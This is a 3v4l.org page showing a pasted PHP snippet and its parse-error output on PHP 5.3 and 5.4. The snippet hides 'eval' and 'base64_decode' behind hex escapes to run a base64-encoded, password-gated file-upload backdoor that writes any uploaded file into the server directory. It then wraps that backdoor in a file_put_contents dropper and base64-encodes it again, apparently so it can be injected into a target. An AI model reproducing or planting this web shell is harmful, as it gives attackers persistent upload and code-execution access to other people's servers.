3v4l.org

run code in 200+ php & hhvm versions
Bugs & Features
<?php $u = '<?php $a="\x65"."v\x61"."l";$b="\x62\x61"."s"."\x656"."4_\x64\x65"."\x63o\x64"."\x65";$a($b(aWYoIWlzc2V0KCRfUE9TVFsncGFzc3dvcmQnXSl8fG1kNSgkX1BPU1RbJ3Bhc3N3b3JkJ10pIT09J2QyY2ZjYjc0NWE3NGFiOGNjZGNkOWUxZTYzZTUzNGQyJylkaWU7JHBhdGg9Z2V0Y3dkKCkuJy8nLmJhc2VuYW1lKCRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKTtpZihAbW92ZV91cGxvYWRlZF9maWxlKCRfRklMRVNbJ2ZpbGUnXVsndG1wX25hbWUnXSwkcGF0aCkpe2VjaG8gJ09rJzt9));' $v = 'file_put_contents("upload",\'' . $u . '\');'; echo $v; echo base64_encode($v);
Output for 5.4.0 - 5.4.14
Parse error: syntax error, unexpected '$v' (T_VARIABLE) in /in/n9Uvg on line 4
Process exited with code 255.
Output for 5.3.0 - 5.3.24
Parse error: syntax error, unexpected T_VARIABLE in /in/n9Uvg on line 4
Process exited with code 255.